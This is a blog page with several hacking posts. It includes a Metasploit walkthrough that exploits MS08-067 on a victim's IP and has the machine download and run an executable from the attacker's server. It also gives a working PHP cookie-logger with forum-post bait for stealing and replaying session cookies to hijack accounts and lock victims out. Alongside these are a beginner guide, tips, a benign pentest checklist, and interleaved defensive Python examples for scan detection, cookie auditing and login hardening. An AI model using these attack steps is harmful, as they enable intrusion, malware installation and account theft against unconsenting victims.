Showing posts with label security. Show all posts

Monday, 15 July 2013

Beginner Guide to Hacking

There are three types of hackers:

White Hats:

--> The White Hat hacker has dedicated himself to fighting malware and helping others with their computer problems. He is a person you can trust, and he will most likely end up in a well-paying job as a computer programmer or a security consultant. He will almost certainly not end up in jail.

Grey Hats:

--> The Grey Hat hacker is in between White Hats and Black Hats. He will most likely play pranks on people that he thinks are harmless, but they can also be illegal. He can at one time be helpful and help you with a computer problem, but at the same time infect you with his own virus. There is a chance that the grey hat will end up in prison.

Black Hats:

--> The Black Hat hacker, also known as a cracker, is the one who defaces websites, steals private information and carries out similar illegal activity. It is very time consuming to become a black hat. It can be very hard for them to get a job because of the illegal activity. If law enforcement gets you, you can expect jail time.

So where to start?

You should know the answer to these questions before you start your hacking career.

Which type of hacker do you want to be (white hat, grey hat or black hat)?
Which type of hacking do you want to work with (website hacking, system exploits, pentesting etc.)?
What is your end-goal?

You should meet these requirements to become a successful hacker.

You shall be patient.
You shall dedicate a lot of time to hacking. You will never stop learning, since hacking is a lifestyle.
You should have a computer (I expect you to have one since you are reading this).
You shall be interested in how the different computer systems work, and how to control them.

Now that you have an idea of what kind of hacker you want to be, we will look more closely at the different topics you can work with as a hacker.

I. Website Hacking:

You probably already guessed it, but website hacking is about hacking websites.
You use your skills to find exploits and vulnerabilities in websites and web applications. Almost all major hacking stories in the news are about websites and databases that have been hacked. Once you have enough experience in website security you will be amazed at how easy it is to find vulnerabilities in websites. However, it will take a lot of effort and time to reach that level of skill. You will need to know a large number of server-side and website construction languages like PHP, HTML, JavaScript, SQL, ASP, ASP.NET and Perl. These are just some of the languages you should know about. I recommend you take JavaScript, SQL and PHP very seriously, since it is in those languages that you will find the most vulnerabilities.

II. Pen testing and Forensics:

Pen testing and forensics can earn you big money. These are the people companies call when they have been hacked. They are experts in operating systems, wireless connections and exploiting computers. This path will take A LOT of time and effort, since there is so much you need to know. You shall know how the different operating systems work, which exploits exist for them, how to exploit them, routers, encryption, malware etc.; the list is almost endless.

III. Code exploiting:

Not many people know about this. This will require you to be a complete expert at programming. You should be at least as good at these programming languages as at your main language, like English. This kind of hacking takes a lot of time and will require you to be patient. Do not get me wrong: every company that releases software, like Symantec, Google, Microsoft, Adobe and Oracle, has hackers with these skills employed to check their software for vulnerabilities. Sadly, they cannot find every security hole, and therefore some very smart black hat hackers are able to find them and exploit them before the companies get the vulnerability patched. You should know the most popular languages like C++, Java and C.

IV. Computer security:

The work these people do looks a lot like that of pentesters. These people are able to detect and analyze new viruses and malware. They work for companies like Symantec, Kaspersky and Avira. Some of them also work in labs that test AVs and new viruses. They are experts in how viruses work and how they infect systems.

You should now have an idea on where to start and in which direction you want to go.

Welcome to the hacker’s world, a new world will open up for you and you will never regret that you chose to become a hacker...

How to infect or hack a computer with only an IP address:

Requirements:

Nmap
Metasploit

First of all you need the target IP of your victim.

Then open the Metasploit Console & type db_create.
[Usage: This will create or connect you to a (your) database.]

Once you do that, type Nmap.
[Usage: This will load Nmap in the Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>
[This will scan the OS, ports and services running on the victim's computer.]
Wait about 5 minutes for the scan to complete.

Once done, note down the OS, ports and services running on the victim's computer.

Now it's time to exploit the victim's machine.
The exploit depends on the OS, ports and services running on the victim's computer.
So you're lucky if you get Windows XP or 2000, because they are easy to exploit,
no matter whether they are protected by a firewall or not.

Now:

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Usage: This will select the exploit windows/smb/ms08_067_netapi]

Now type show targets
[Usage: This will show all targets for the exploit]

Now type set target 0
[Usage: This will set the target to the one specified, 0]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload windows/download_exec
[Usage: This will set the payload as windows/download_exec]

Then type show options
[Usage: This will show all options in the exploit & payload]

In the window you will see many options, of which you need to
fill in only two: RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx>
[Usage: This will set RHOST (the victim's IP) to xxx.xxx.xxx.xxx]

Next type set URL http://www.xxxx.com/xxx.exe
[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit
[Usage: This will launch the exploit & your victim will be infected.]

You can now control your victim with a RAT (remote administration tool).
So any version of Windows 2000 to XP can be exploited easily.

You can use the command db_autopwn -p -t -e.

In most cases you get a shell!
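From the defender's side of the procedure above: the db_nmap -sT -sV step is a full TCP connect scan, and on a firewall that logs new connections it leaves a distinctive trace, one source address touching many different destination ports on the same host within a few seconds. The following is an added example, not code from the original post, of detection logic run over constructed iptables-style log lines; the log format, the addresses, the 60-second window and the ten-port threshold are assumptions made for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed iptables-style LOG lines (not taken from any real system). 203.0.113.7 runs a
# TCP connect scan against 192.0.2.10; 198.51.100.5 is ordinary HTTPS traffic to the same host.
SAMPLE_LOG = """\
Jul 15 10:00:01 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=21 SYN
Jul 15 10:00:01 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40002 DPT=22 SYN
Jul 15 10:00:01 gw kernel: IN=eth0 OUT= SRC=198.51.100.5 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=443 SYN
Jul 15 10:00:02 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40003 DPT=23 SYN
Jul 15 10:00:02 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40004 DPT=25 SYN
Jul 15 10:00:02 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40005 DPT=53 SYN
Jul 15 10:00:03 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40006 DPT=80 SYN
Jul 15 10:00:03 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40007 DPT=110 SYN
Jul 15 10:00:03 gw kernel: IN=eth0 OUT= SRC=198.51.100.5 DST=192.0.2.10 PROTO=TCP SPT=51001 DPT=443 SYN
Jul 15 10:00:04 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40008 DPT=135 SYN
Jul 15 10:00:04 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40009 DPT=139 SYN
Jul 15 10:00:05 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40010 DPT=443 SYN
Jul 15 10:00:05 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40011 DPT=445 SYN
Jul 15 10:00:06 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40012 DPT=3389 SYN
Jul 15 10:00:07 gw kernel: IN=eth0 OUT= SRC=198.51.100.5 DST=192.0.2.10 PROTO=TCP SPT=51002 DPT=443 SYN
"""

# Pulls the syslog timestamp, source, destination and destination port out of one TCP log line.
LOG_RE = re.compile(
    r"(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+).*?PROTO=TCP.*?DPT=(?P<dpt>\d+)"
)


def parse_line(line):
    """Return (timestamp, src, dst, dport) for a TCP firewall log line, or None if it is not one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year; strptime defaults to 1900, which is fine for time deltas.
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return ts, m["src"], m["dst"], int(m["dpt"])


def detect_port_scans(log_text, window=timedelta(seconds=60), min_ports=10):
    """Return {(src, dst): distinct_ports} for every source/destination pair that touched at
    least `min_ports` distinct destination ports inside any `window`-long span of time."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            ts, src, dst, dport = parsed
            events[(src, dst)].append((ts, dport))

    alerts = {}
    for pair, evs in events.items():
        evs.sort()  # sliding window over time-ordered events for this pair
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            distinct = {port for _, port in evs[start:end + 1]}
            if len(distinct) >= min_ports:
                alerts[pair] = max(alerts.get(pair, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for (src, dst), count in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan: {src} -> {dst}, {count} distinct ports within the window")
```

The benign client hits only port 443 and never trips the threshold, while the scanning host reaches twelve distinct ports in six seconds; in production the same logic would run over the firewall's real LOG lines (which carry more fields than the constructed sample, hence the permissive regex) with the window and threshold tuned to the network.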

Create a CookieLogger and Hack any Account!



Cookies store all the necessary information about one's account; using this information you can hack anybody's account and change his password. If you get the cookies of the victim you can hack any account the victim is logged into, i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.

What is a CookieLogger?

A CookieLogger is a script that is used to steal anybody's cookies and store them in a log file from where you can read the cookies of the victim.

Today we are going to show how to make your own cookie logger. Hope you will enjoy reading it.

Step 1: Save the notepad file from the link below and rename it Fun.gif:

http://crocko.com/1702516956.html

Step 2: Copy the following script into a Notepad file and save the file as cookielogger.php:


<?php
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
    if (!$handle = fopen($filename, 'a'))
    {
        echo "Temporary Server Error,Sorry for the inconvenience.";
        exit;
    }
    else
    {
        if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
        {
            echo "Temporary Server Error,Sorry for the inconvenience.";
            exit;
        }
    }
    echo "Temporary Server Error,Sorry for the inconvenience.";
    fclose($handle);
    exit;
}
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don't have a website, you can use the following site to get a free website with PHP support:

http://0fees.net/

Step 5: Go to the victim forum and insert this code in the signature or a post:

http://crocko.com/1702516964.html

<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>

Step 6: When the victim sees the post he views the image you uploaded, but when he clicks the image he gets a Temporary Error and you get his cookie in logfile.txt. The cookie would look as follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get access to the victim's account you need to replace your cookies with the victim's cookie. You can use a cookie editor for this. The string before "=" is the name of the cookie and the string after "=" is its value. So change the values of the cookies in the cookie editor.

Step 8: Go to the website whose account you have just hacked and you will find that you are logged in as the victim; now you can change the victim's account information.

Note: Make sure that from Step 6 to 8 the victim is online, because you are actually hijacking the victim's session. So if the victim clicks Logout you will also be logged out automatically, but once you have changed the password you can log in again with the new password and the victim will not be able to log in.

Disclaimer: We don’t take responsibility for what you do with this script, served for educational purpose only...
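The mitigation side of the session hijacking described above, as an added example that is not part of the original post: a small auditor for Set-Cookie headers that flags the properties which make a session cookie easy to steal or replay (no HttpOnly, no Secure, no SameSite, and a value that is readable serialized data rather than an opaque token), beside a function that issues a hardened cookie. The headers audited are constructed for this example; the first two reuse the names and values from the phpBB cookie string shown in Step 6, set as a server without any attributes would have set them, and the attribute checks are this example's assumptions about what a hardened session cookie should carry.

```python
import re
import secrets
from urllib.parse import unquote

# Matches PHP serialize() output, the format of the phpbb2mysql_data value shown above.
PHP_SERIALIZED_RE = re.compile(r'^(a:\d+:\{|s:\d+:"|i:-?\d+;|O:\d+:")')


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value or True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header):
    """Return the list of weaknesses that make this cookie easy to steal or replay."""
    name, value, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly (readable by any script running in the page)")
    if "secure" not in attrs:
        findings.append("missing Secure (sent over plain HTTP, visible on the wire)")
    same_site = attrs.get("samesite")
    if not isinstance(same_site, str) or same_site.lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict (attached to cross-site requests)")
    if PHP_SERIALIZED_RE.match(unquote(value)):
        findings.append("value is readable serialized data rather than an opaque random token")
    return findings


def issue_session_cookie(name="sid", token=None):
    """Build a hardened Set-Cookie header; the token is a fresh random value unless given."""
    token = token or secrets.token_hex(16)
    return f"{name}={token}; Path=/; Secure; HttpOnly; SameSite=Lax"


# Constructed Set-Cookie headers for the audit (the first two reuse the values from the post).
SAMPLE_HEADERS = [
    "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22"
    "%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D",
    "phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9",
    issue_session_cookie(),
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        name = parse_set_cookie(header)[0]
        print(name, "->", audit_set_cookie(header) or ["no findings"])
```

HttpOnly removes the in-page script path to the cookie, Secure and SameSite close the network and cross-site paths, and an opaque random token means there is nothing to learn from decoding the value. Invalidating the session server-side on logout, which is the behaviour the note above depends on, is what limits the damage once a cookie has leaked anyway.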

20 Best Ways to become a Better Hacker

1) Learning scripting languages such as Python, Perl and Ruby can help you automate your tasks and will surely improve your skills.

2) Understanding all possible user inputs is the fastest way to hack into systems.

3) When you gain access to an account or whatever you are hacking into, best practice is not to alter anything; just monitor the activity and continue fetching the information you need.

4) Travel and see different countries, it will make you better.

5) Never hesitate to use Google and other available resources, e.g. exploit-db, and stay updated on the versions and the bugs in each version. For example, if I talk about WordPress, then someone looking to hack or pentest a WordPress website should be well aware of at least the 3.0+ version updates, so whichever version is used on the website, he should know the vulnerabilities in that version and how they are exploited.

6) RTFM, don't expect handouts. Educated questions get you educated answers.

7) Move to Linux, learn programming languages such as C, Perl, Lisp, Java and HTML, and write open source programs. Improve your functional English.

8) The most important factor in becoming a good hacker is that you must have a personal interest in computers. Additionally, you have to be definite in your work, such that you take an interest in exactly one thing at a time. After covering the appropriate level of theory, the learner should try it practically until satisfied. Watch tutorials only for taking points, not for following them from A to Z exactly, because you can only be a good learner if you have your own intention of doing things creatively.

9) One thing: learn how the old hackers started. Don't focus on new programs like BackTrack and Metasploit; learn manual hacking, learn coding and be patient! Knowledge will come with time, and practice all methods.

10) Do not rely on tricks for hacking, as they will keep you a script kiddie; get a deep understanding of things. Also, don't rush from one topic to another. All of those combined will make you a better hacker. "Slow and steady wins the race."

11) Support will always lift you up. Join groups and forums. Keep yourself updated with the latest hacking news by reading blogs [like this ;)], tweets etc.

12) Understand which programming language to use at which moment. Your time is valuable, so don't waste it writing something that could have been done faster! (And understand the difference between a scripting language and a programming language; Python, for example, is a programming language.)

13) During hacking remain mentally focused on each step. During a step, always remember your next steps and how you will link them. Don't always use old methods and tricks; try new ones and use your own mind too. And remember one thing: there is no shortcut to hacking. To become a hacker, you have to give your whole passion to hacking. "Hacking is an art, and a hacker is an artist."

14) This attitude should be there within you: "Sweat more in practice, so you bleed less in war."

15) Whatever you're going to test, start with the basic stuff. If you don't know any, start learning.

16) Enumeration is the key to pwnage: the more you enumerate, the more attack surface you get.

17) Be patient! Learn different protocols and read the RFCs to understand how they work and whether there are some "security by design" issues. After that you should try to understand the context you're in and then develop an exploit for that particular context.

18) Sleep less, read more. Learn, think, try, fail and never give up. Remember, "...imagination will take you everywhere".

19) Don't compete with anyone and never think you are the best; compete only with "the you of the past". There will always be a vulnerability waiting to be discovered by someone who thinks differently. Understanding human logic makes things easier. "Hackers realize, kiddies memorize."

20) Learn your own systems inside out, before moving on to other systems. The better you know your own, the more capable you will find yourself when it comes time to make your system work for you.

Friday, 4 January 2013

Penetration Testing – Complete Guide with Sample Test Cases


What is Penetration Testing?
It is the process of identifying security vulnerabilities in an application by evaluating the system or network with various malicious techniques. The purpose of this test is to secure important data from outsiders like hackers who could gain unauthorized access to the system. Once a vulnerability is identified, it is used to exploit the system in order to gain access to sensitive information.
Causes of vulnerabilities:
- Design and development errors
- Poor system configuration
- Human errors

Why Penetration testing?

- Financial data must be secured while being transferred between different systems
- Many clients are asking for pen testing as part of the software release cycle
- To secure user data
- To find security vulnerabilities in an application
Penetration testing
It is very important for any organization to identify the security issues present in its internal network and computers. Using this information the organization can plan a defense against any hacking attempt. User privacy and data security are the biggest concerns nowadays. Imagine if a hacker managed to get the user details of a social networking site like Facebook. An organization can face legal issues due to a small loophole left in a software system. Hence big organizations are looking for PCI compliance certification before doing any business with third party clients.
What should be tested?
- Software
- Hardware
- Network
- Process

Penetration Testing Types:

1) Social Engineering: Human errors are the main cause of security vulnerabilities. Security standards and policies should be followed by all staff members to avoid social engineering penetration attempts. Examples of these standards include not mentioning any sensitive information in email or phone communication. Security audits can be conducted to identify and correct process flaws.
2) Application Security Testing: Using software methods one can verify whether the system is exposed to security vulnerabilities.
3) Physical Penetration Test: Strong physical security methods are applied to protect sensitive data. This is generally useful in military and government facilities. All physical network devices and access points are tested for the possibility of any security breach.
Pen Testing Techniques:
1) Manual penetration test
2) Using automated penetration test tools
3) Combination of both manual and automated process
The third process is the more common one for identifying all kinds of vulnerabilities.

Penetration Testing Tools:

Automated tools can be used to identify some standard vulnerabilities present in an application. Pentest tools scan code to check whether there is malicious code present which could lead to a potential security breach. Pentest tools can verify security loopholes present in the system, such as data encryption techniques and hard-coded values like usernames and passwords.
Criteria to select the best penetration tool:
- It should be easy to deploy, configure and use.
- It should scan your system easily.
- It should categorize vulnerabilities based on severity that needs immediate fix.
- It should be able to automate verification of vulnerabilities.
- It should re-verify exploits found previously.
- It should generate detailed vulnerability reports and logs.
Once you know what tests you need to perform, you can either train your internal test resources or hire expert consultants to do the penetration task for you.
Examples of free and commercial tools:
Nmap, Nessus, Metasploit, Wireshark, OpenSSL, Cain & Abel, THC Hydra, w3af
Commercial services: Pure Hacking, Torrid Networks, SecPoint, Veracode.
Limitations of pentest tools: Sometimes these tools flag false positives, which results in developers spending more time analyzing vulnerabilities that are not actually present.

Manual Penetration Test:

It is difficult to find all vulnerabilities using automated tools. There are some vulnerabilities which can be identified by manual scanning only. Penetration testers can perform better attacks on an application based on their skills and knowledge of the system being penetrated. Methods like social engineering can be done by humans only. Manual checking includes design, business logic as well as code verification.
Penetration Test Process:
Let's discuss the actual process followed by test agencies or penetration testers. Identifying the vulnerabilities present in the system is the first important step in this process. Corrective action is taken on these vulnerabilities and the same penetration tests are repeated until the system is negative for all of those tests.
We can categorize this process into the following steps:
1) Data collection: Various methods, including Google search, are used to get target system data. One can also use web page source code analysis to get more information about the system, software and plugin versions. There are many free tools and services available in the market which can give you information like database or table names, DB versions, software versions, hardware used and the various third party plugins used in the target system.
2) Vulnerability Assessment: Based on the data collected in the first step, one can find the security weaknesses in the target system. This helps penetration testers to launch attacks using the identified entry points in the system.
3) Actual Exploit: This is the crucial step. It requires special skills and techniques to launch an attack on the target system. Experienced penetration testers can use their skills to launch an attack on the system.
4) Result analysis and report preparation: After completion of the penetration tests, detailed reports are prepared for taking corrective action. All identified vulnerabilities and recommended corrective methods are listed in these reports. You can customize the vulnerability report format (HTML, XML, MS Word or PDF) as per your organization's needs.

Penetration testing sample test cases (test scenarios):

Remember this is not functional testing. In a pentest your goal is to find security holes in the system. Below are some generic test cases, not necessarily applicable to all applications.
1) Check whether the web application is able to identify spam attacks on the contact forms used on the website.
2) Proxy server – check whether network traffic is monitored by proxy appliances. A proxy server makes it difficult for hackers to get internal details of the network, thus protecting the system from external attacks.
3) Spam email filters – verify that incoming and outgoing email traffic is filtered and unsolicited emails are blocked. Many email clients come with built-in spam filters which need to be configured as per your needs. These configuration rules can be applied to email headers, subject or body.
4) Firewall – make sure the entire network or all computers are protected with a firewall. A firewall can be software or hardware that blocks unauthorized access to the system. A firewall can prevent data being sent outside the network without your permission.
5) Try to exploit all servers, desktop systems, printers and network devices.
6) Verify that all usernames and passwords are encrypted and transferred over a secured connection such as HTTPS.
7) Verify the information stored in website cookies. It should not be in readable format.
8) Verify previously found vulnerabilities to check that the fix is working.
9) Verify that there is no open port in the network.
11) Verify all telephone devices.
12) Verify Wi-Fi network security.
13) Verify all HTTP methods. PUT and DELETE methods should not be enabled on the web server.
14) Passwords should be at least 8 characters long and contain at least one number and one special character.
15) Usernames should not be like "admin" or "administrator".
16) The application login page should be locked after a few unsuccessful login attempts.
17) Error messages should be generic and should not mention specific error details like "Invalid username" or "Invalid password".
19) Verify that special characters, HTML tags and scripts are handled properly as input values.
20) Internal system details should not be revealed in any error or alert messages.
21) Custom error messages should be displayed to the end user in case of a web page crash.
22) Verify the use of registry entries. Sensitive information should not be kept in the registry.
23) All files must be scanned before uploading to the server.
24) Sensitive data should not be passed in URLs while communicating between different internal modules of the web application.
25) There should not be any hard-coded username or password in the system.
26) Verify all input fields with long input strings, with and without spaces.
27) Verify that the reset password functionality is secure.
28) Verify the application for SQL injection.
29) Verify the application for cross-site scripting.
31) Important input validations should be done on the server side instead of JavaScript checks on the client side.
32) Critical resources in the system should be available to authorized persons and services only.
33) All access logs should be maintained with proper access permissions.
34) Verify that the user session ends upon log off.
35) Verify that directory browsing is disabled on the server.
36) Verify that all application and database versions are up to date.
37) Verify URL manipulation to check that the web application does not show any unwanted information.
38) Verify memory leaks and buffer overflows.
39) Verify that incoming network traffic is scanned to find Trojan attacks.
40) Verify that the system is safe from brute force attacks – a trial and error method to find sensitive information like passwords.
41) Verify that the system or network is secured from DoS (denial-of-service) attacks. A hacker can target a network or a single computer with continuous requests, due to which resources on the target system get overloaded, resulting in denial of service for legitimate requests.
These are just the basic test scenarios to get started with pentesting. There are hundreds of advanced penetration methods which can be applied either manually or with the help of automation tools.
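Test cases 14, 16 and 17 above describe what a login page should do about password policy, lockout and error messages, and test case 15 what it should do about predictable usernames. As an added example that is not part of the original article, here is a login function of the kind those test cases would flag, beside a hardened one that passes them; the in-memory user store, the five-attempt threshold, the PBKDF2 parameters and the sample credentials are all assumptions made for this example.

```python
import hashlib
import hmac
import re
import secrets

MAX_FAILED_ATTEMPTS = 5                          # test case 16: lock after a few failures
GENERIC_ERROR = "Invalid username or password"   # test case 17: one message for every failure
PBKDF2_ITERATIONS = 100_000                      # assumed work factor for this example


def password_meets_policy(password):
    """Test case 14: at least 8 characters, one digit and one special character."""
    return (len(password) >= 8
            and re.search(r"\d", password) is not None
            and re.search(r"[^A-Za-z0-9]", password) is not None)


def hash_password(password, salt):
    """Salted PBKDF2-HMAC-SHA256; only the hash is stored (test case 25: no plaintext secrets)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


class UserStore:
    """In-memory user table constructed for this example, not a real application's store."""

    def __init__(self):
        self.users = {}             # username -> (salt, password hash)
        self.failed_attempts = {}   # username -> consecutive failed logins
        # Dummy credentials so that an unknown username costs the same hashing time as a real one.
        self._dummy_salt = secrets.token_bytes(16)
        self._dummy_hash = hash_password(secrets.token_hex(16), self._dummy_salt)

    def add_user(self, username, password):
        if username.lower() in ("admin", "administrator"):   # test case 15
            raise ValueError("predictable username")
        if not password_meets_policy(password):              # test case 14
            raise ValueError("password does not meet policy")
        salt = secrets.token_bytes(16)
        self.users[username] = (salt, hash_password(password, salt))


def vulnerable_login(store, username, password):
    """The pattern test case 17 rejects: two different messages reveal which usernames exist,
    and nothing limits retries, which test case 16 requires."""
    if username not in store.users:
        return False, "Invalid username"
    salt, stored = store.users[username]
    if hash_password(password, salt) != stored:
        return False, "Invalid password"
    return True, "Welcome"


def hardened_login(store, username, password):
    """Generic failure message, per-account lockout and constant-time hash comparison."""
    if store.failed_attempts.get(username, 0) >= MAX_FAILED_ATTEMPTS:
        return False, GENERIC_ERROR   # locked: the message deliberately does not say so
    salt, stored = store.users.get(username, (store._dummy_salt, store._dummy_hash))
    ok = hmac.compare_digest(hash_password(password, salt), stored)
    if not ok or username not in store.users:
        store.failed_attempts[username] = store.failed_attempts.get(username, 0) + 1
        return False, GENERIC_ERROR
    store.failed_attempts[username] = 0
    return True, "Welcome"


if __name__ == "__main__":
    store = UserStore()
    store.add_user("alice", "Sunny-day42")   # constructed sample credentials
    print("vulnerable, unknown user:", vulnerable_login(store, "bob", "x"))
    print("hardened, unknown user:  ", hardened_login(store, "bob", "x"))
    for _ in range(MAX_FAILED_ATTEMPTS):
        hardened_login(store, "alice", "wrong-password")
    print("hardened, correct password after lockout:", hardened_login(store, "alice", "Sunny-day42"))
```

Run against the vulnerable function, test case 17 fails immediately (the reply differs for a missing user and a wrong password) and test case 16 fails because the twentieth wrong guess is treated like the first; the hardened function answers every failure identically, including the locked state, and hashes a dummy credential for unknown users so that response time does not reveal what the message hides.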
Further reading:
Pen Testing Standards: PCI DSS (Payment Card Industry Data Security Standard), OWASP (Open Web Application Security Project), ISO/IEC 27002, OSSTMM (The Open Source Security Testing Methodology Manual).
Certifications: GPEN, Associate Security Tester (AST), Senior Security Tester (SST), Certified Penetration Tester (CPT).
Finally, as a penetration tester you should collect and log all vulnerabilities in the system. Don't ignore any scenario on the grounds that it won't be executed by end users.
